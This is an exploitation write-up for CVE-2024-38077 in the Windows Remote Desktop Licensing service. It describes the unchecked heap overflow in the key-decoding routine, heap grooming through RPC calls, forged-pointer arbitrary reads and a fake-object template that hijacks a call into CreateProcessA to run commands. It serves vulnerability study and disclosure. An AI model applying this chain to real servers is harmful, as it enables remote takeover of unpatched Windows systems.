Also known as MadLicense, a vulnerability in almost every version of Windows Server that leads to 0-click RCE.

1. Vuln Analysis

1.1 Call Stack

 # Child-SP          RetAddr               Call Site

00 000000b9`d2ffbd30 00007fff`67a76fec     lserver!CDataCoding::DecodeData
01 000000b9`d2ffbd70 00007fff`67a5c793     lserver!LKPLiteVerifyLKP+0x38
02 000000b9`d2ffbdc0 00007fff`67a343eb     lserver!TLSDBTelephoneRegisterLicenseKeyPack+0x163
03 000000b9`d2ffd7d0 00007fff`867052a3     lserver!TLSRpcTelephoneRegisterLKP+0x15b
04 000000b9`d2fff0c0 00007fff`8664854d     RPCRT4!Invoke+0x73
05 000000b9`d2fff120 00007fff`86647fda     RPCRT4!NdrStubCall2+0x30d
06 000000b9`d2fff3d0 00007fff`866b7967     RPCRT4!NdrServerCall2+0x1a

1.2 Vuln

__int64 __fastcall CDataCoding::DecodeData(CDataCoding *this, wchar_t *a2, unsigned __int8 **a3, unsigned int *a4)
{
  unsigned int v4; // edi
  int v8; // ebp
  unsigned int v9; // ebx
  HANDLE ProcessHeap; // rax
  unsigned __int8 *v11; // rax
  unsigned __int8 *v12; // rbx
  wchar_t *v13; // rax
  __int64 v14; // rcx
  unsigned __int8 *v15; // rdx
  __int64 v16; // r9
  unsigned int v17; // ecx
  HANDLE v18; // rax

  v4 = 0;
  v8 = 0;
  if ( a3 )
  {
    v9 = dwBytes; // always 21
    *a3 = 0LL;
    *a4 = 0;
    ProcessHeap = GetProcessHeap();
    v11 = (unsigned __int8 *)HeapAlloc(ProcessHeap, 8u, v9);   // fixed size
    v12 = v11;
    if ( v11 )
    {
      memset_0(v11, 0, (unsigned int)dwBytes);
      while ( *a2 )
      {
        // Str: BCDFGHJKMPQRTVWXY2346789 (base-24 alphabet); a2: user-controlled
        v13 = wcschr_0(Str, *a2);
        if ( !v13 )
        {
          v4 = 13;
          v18 = GetProcessHeap();
          HeapFree(v18, 0, v12);
          return v4;
        }
        // accumulate a2 from base 24 into the buffer as little-endian bytes (base 256)
        v14 = v13 - Str;
        v15 = v12;
        v16 = (unsigned int)(v8 + 1);
        do
        {
          v17 = dword_1800D61C8 * *v15 + v14;
          *v15++ = v17;
          LODWORD(v14) = v17 >> 8;
          --v16;
        }
        while ( v16 );
        if ( (_DWORD)v14 )
          v12[++v8] = v14; // append the carry byte; v8 is never checked against dwBytes
        ++a2;
      }
      *a4 = dwBytes;
      *a3 = v12;
    }
    else
    {
      return 8;
    }
  }
  else
  {
    return 87;
  }
  return v4;
}

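The loop never checks v8 against dwBytes, so a sufficiently long input string writes past the end of the fixed 21-byte heap buffer. This is a heap overflow without any restriction on length.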
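
To make the missing check concrete, here is a minimal Python model of the decoding loop together with a bounded variant. It assumes the multiplier dword_1800D61C8 equals 24 (the alphabet length). The names decode_unbounded and decode_checked are hypothetical; the bounded variant only illustrates the kind of check that is missing and is not the patched Microsoft code.

```python
ALPHABET = "BCDFGHJKMPQRTVWXY2346789"  # Str in the decompilation
BASE = len(ALPHABET)                   # assumed value of dword_1800D61C8 (24)
BUF_SIZE = 21                          # dwBytes in the decompilation


def decode_unbounded(text):
    """Model of the loop: returns every byte the routine would write."""
    buf = [0]                          # buf[0..v8]; grows the way ++v8 does
    for ch in text:
        carry = ALPHABET.index(ch)     # v14 = v13 - Str (ValueError if absent)
        for i in range(len(buf)):
            v = BASE * buf[i] + carry  # v17
            buf[i] = v & 0xFF          # low byte stays in place
            carry = v >> 8             # high part carries into the next byte
        if carry:
            buf.append(carry)          # v12[++v8] = v14, with no bound check
    return bytes(buf)


def decode_checked(text, size=BUF_SIZE):
    """Same arithmetic, but refuses input that does not fit in `size` bytes."""
    out = decode_unbounded(text)
    if len(out) > size:
        raise ValueError("decoded value needs %d bytes, buffer holds %d"
                         % (len(out), size))
    return out.ljust(size, b"\x00")    # zero-padded, like the memset'd buffer
```

The model shows that the number of bytes written depends only on the length and content of the input string, which is why a length check before or inside the loop is the natural fix.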

1.3 Vuln Component

lserver.dll loaded by svchost.exe

TLSRpcTelephoneRegisterLKP() function

2. Heap Management Mechanism

The service uses the segment heap.

We mainly focus on the LFH (Low Fragmentation Heap), since the vulnerable buffer is served from it. LFH chunks are:

  • headless
  • randomly allocated

3. Exploitation

3.1 Enable LFH

Bucket activation occurs if there are 17 active allocations for the bucket’s allocation size.

Bucket activation also occurs if there are 2,040 allocation requests for the bucket’s allocation size.

Here we allocate 2,040 chunks with size 0x20 to enable LFH.
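
The two activation rules can be written as a tiny predicate. This is only a model of the rules as stated above, not of the real heap internals. The function and parameter names are made up for illustration, and treating the thresholds as "at least" is an assumption.

```python
LFH_ACTIVE_THRESHOLD = 17      # active allocations of one bucket size
LFH_REQUEST_THRESHOLD = 2040   # total allocation requests of one bucket size


def lfh_bucket_activated(active_allocations, total_requests):
    """True if either rule stated above would activate the bucket."""
    return (active_allocations >= LFH_ACTIVE_THRESHOLD
            or total_requests >= LFH_REQUEST_THRESHOLD)
```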

TLSRpcRegisterLicenseKeyPack() takes an encrypted payload and allocates memory for it after decryption, so it lets us make heap allocations of a size we choose.

Here we use TLSRpcRegisterLicenseKeyPack() to spray 0x20 chunks.

3.2 Leak Address

The widely used lpContext structure is allocated on each TLSRpcConnect() call and returned as a handle.

typedef struct __ClientContext {

    LPTSTR  m_Client;
    long    m_RefCount;
    DWORD   m_ClientFlags;

    DWORD   m_LastError;
    CONTEXTHANDLE_TYPE m_ContextType;
    HANDLE  m_ContextHandle;

    // NEEDED - A list to store all memory/handle
    //          allocated for the client

} CLIENTCONTEXT, *LPCLIENTCONTEXT;

It is 0x20 bytes in size, which means it is allocated from the same bucket as our vulnerable buffer.
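
The 0x20 figure can be checked by laying the structure out with ctypes. This is a sketch under the assumption of the x64 Windows ABI (8-byte pointers and handles, 4-byte long and DWORD) and of CONTEXTHANDLE_TYPE being a 4-byte enum. The Python class name ClientContext is only illustrative.

```python
import ctypes


class ClientContext(ctypes.Structure):
    # Fixed-width types are used so the result does not depend on the
    # platform this script runs on.
    _fields_ = [
        ("m_Client", ctypes.c_uint64),         # LPTSTR (8-byte pointer)
        ("m_RefCount", ctypes.c_int32),        # long
        ("m_ClientFlags", ctypes.c_uint32),    # DWORD
        ("m_LastError", ctypes.c_uint32),      # DWORD
        ("m_ContextType", ctypes.c_uint32),    # CONTEXTHANDLE_TYPE (assumed 4-byte enum)
        ("m_ContextHandle", ctypes.c_uint64),  # HANDLE (8-byte)
    ]


print(hex(ctypes.sizeof(ClientContext)))       # prints 0x20
for name, _ in ClientContext._fields_:
    print(name, hex(getattr(ClientContext, name).offset))
```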

Thus we can spray handles with TLSRpcConnect(), free some of them, and then allocate the vulnerable buffer with TLSRpcTelephoneRegisterLKP(). The overflow then easily reaches a neighbouring lpContext structure, and the pointers in that structure are promising targets.

TLSRpcRetrieveTermServCert() takes the lpContext as an argument and copies lpContext->m_Client into the license request:

SAFESTRCPY(LicenseRequest.szMachineName, lpContext->m_Client);
SAFESTRCPY(LicenseRequest.szUserName, lpContext->m_Client);

Finally, it returns the ppbCert containing the LicenseRequest.

Since lpContext->m_Client is easy to forge, we get an AAR (arbitrary address read).

3.3 Hijack rip

3.3.1 Hijack Control Flow

TLSRpcKeyPackEnumNext() -> TLSDBLicenseKeyPackEnumNext() -> TLSDBKeyPackEnumNext() -> lpContext->m_ContextHandle->pbWorkSpace->m_LicPackTable.EnumerateNext()

This chain ends in a virtual function call on an object reached through lpContext.

error_status_t 
TLSRpcKeyPackEnumNext( 
    /* [in] */ PCONTEXT_HANDLE phContext,
    /* [ref][out] */ LPLSKeyPack lpKeyPack,
    /* [ref][out][in] */ PDWORD dwErrCode
    )
{
    ...
    LPENUMHANDLE hEnum=(LPENUMHANDLE)lpContext->m_ContextHandle;
    status=TLSDBLicenseKeyPackEnumNext( 
                            hEnum, 
                            lpKeyPack,
                            bShowAll
                        );
    ...
}

DWORD 
TLSDBLicenseKeyPackEnumNext(
    LPENUMHANDLE lpEnumHandle, 
    LPLSKeyPack lpLsKeyPack,
    BOOL bShowAll
    )
{
    ...
    switch(lpEnumHandle->chFetchState)
    {
        case ENUMHANDLE::FETCH_NEXT_KEYPACK:
            dwStatus=TLSDBKeyPackEnumNext(
                                lpEnumHandle->pbWorkSpace, 
                                &lpEnumHandle->CurrentKeyPack
                            );
    ...
}

DWORD
TLSDBKeyPackEnumNext( 
    IN PTLSDbWorkSpace pDbWkSpace, 
    IN OUT PTLSLICENSEPACK lpKeyPack
    )
{
    ...
    LicPackTable& licpackTable=pDbWkSpace->m_LicPackTable;
    switch(licpackTable.EnumerateNext(*lpKeyPack))
    ...
}

So in TLSDBKeyPackEnumNext(), the overflow lets us control the call to

lpContext->m_ContextHandle->pbWorkSpace->m_LicPackTable.EnumerateNext()

In the decompilation:

__int64 __fastcall TLSDBKeyPackEnumNext(__int64 *a1, void *a2)
{
  if ( a1 && a2 )
  {
    (*(void (__fastcall **)(__int64 *, void *, _QWORD, _QWORD))(*a1 + 0x70))(a1, a2, 0LL, 0LL);
    v3 = (*(__int64 (__fastcall **)(__int64 *))(*a1 + 0x1F0))(a1);
    ...

3.3.2 Leak Fake Object Address

Since we need to forge the function pointer, we need to forge the whole m_ContextHandle. Because the fake object contains several layers of pointers, we must also know the address at which it ends up.

Recall the segment heap mechanism: LFH and VS are allocated from the backend allocator, and luckily the _SEGMENT_HEAP structure contains information about the last block of the current backend heap.

Now that we have an AAR primitive, we can read the address of the last block, and blocks are allocated contiguously. So we spray our fakeobj and can predict an address that one of the copies will occupy.

3.3.3 Construct Fake Object

Now we have the fakeobj address. We just forge the object according to its definition:

//lpContext->m_ContextHandle
typedef struct __ENUMHANDLE {
    typedef enum {
        FETCH_NEXT_KEYPACK=1,
        FETCH_NEXT_KEYPACKDESC,
        FETCH_NEW_KEYPACKDESC
    } ENUM_FETCH_CODE;

    PTLSDbWorkSpace pbWorkSpace;
    TLSLICENSEPACK  CurrentKeyPack;

    LICPACKDESC     KPDescSearchValue;
    DWORD           dwKPDescSearchParm;
    BOOL            bKPDescMatchAll;
    CHAR            chFetchState;
} ENUMHANDLE, *LPENUMHANDLE;


//lpContext->m_ContextHandle->pbWorkSpace
typedef struct __TlsDbWorkSpace {

    static JBInstance g_JbInstance;

    JBSession  m_JetSession;
    JBDatabase m_JetDatabase;


    LicPackTable            m_LicPackTable; // Target
    LicensedTable           m_LicensedTable;
    ...

} TLSDbWorkSpace, *LPTLSDbWorkSpace, *PTLSDbWorkSpace;

3.4 Hijack Arguments

As the decompilation above indicates, rcx is a pointer to pbWorkSpace, which is unusable as an argument in most cases because its first element must be *m_LicPackTable.

Then we look into the magical NdrServerCall2(). It receives a pointer to an RpcMsg structure as its only argument and eventually calls a function pointer taken from that structure, with an argument list that is also derived from the structure (though the process is rather complicated).

NdrServerCall2() -> NdrStubCall2() -> ... -> Invoke()

Anyway, the function is really complicated. It does a lot of work to parse RpcMsg, but most of it can be easily(?) bypassed by constructing the right structures.

The hardest part is that the attributes of the arguments are delivered in a specially formatted string. After reversing it, I made a template for easier reuse.

    pbWorkSpace += b"\x32\x48"
    pbWorkSpace += b"\x00\x00\x00\x00"
    pbWorkSpace += b"\x00\x00" #procNum
    pbWorkSpace += p16(argnum * 8) #stacksize
    # pbWorkSpace += b"\x30\xe0\x00\x00\x00\x00"
    # NdrInfo.pProcDesc
    pbWorkSpace += b"\xc0\x00\x10\x00" #ClientBufferSize & ServerBufferSize
    pbWorkSpace += b"\x40" #Oi2Flags
    pbWorkSpace += p8(argnum * 2) #NumberParams
    # NdrExts
    pbWorkSpace += b"\x0a" #Size
    pbWorkSpace += b"\x01\x00\x00" #Flags2 & ClientCorrHint & ServerCorrHint
    pbWorkSpace += b"\x00\x00\x00\x00" #NotifyIndex
    pbWorkSpace += b"\x00\x00"
    # Params
    for i in range(argnum * 2):
        pbWorkSpace += p16(0x48)
        pbWorkSpace += p16(i * 4)
        pbWorkSpace += p16(0x09)

Finally, we get an arbitrary call with arbitrary arguments (though the fakeobj looks scary).

3.5 After Arbitrary Call

Now we have exactly one arbitrary call, after which the process crashes.

Because of CFG (Control Flow Guard), we are not able to use ROP or shellcode.

The method from the original author is to use LoadLibraryA() to load an evil DLL from a remote SMB server. But as a low-privilege user, I found that loading a DLL into svchost.exe from remote SMB is forbidden, though loading from a local path is possible.

Then I turned to CreateProcessA(), which is similar to WinExec(). We can execute a cmd command now.

Notice:

  • CreateProcessA() is NOT equivalent to cmd. Only one command is allowed, which means ‘&&’, ‘&’ and ‘|’ are not allowed. So we have to use cmd.exe /C "xxx" to execute multiple commands at a time.
  • cmd.exe /C "xxx" only allows double quotation marks.
  • I failed to launch powershell.exe, which may be related to some policy.

4. References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077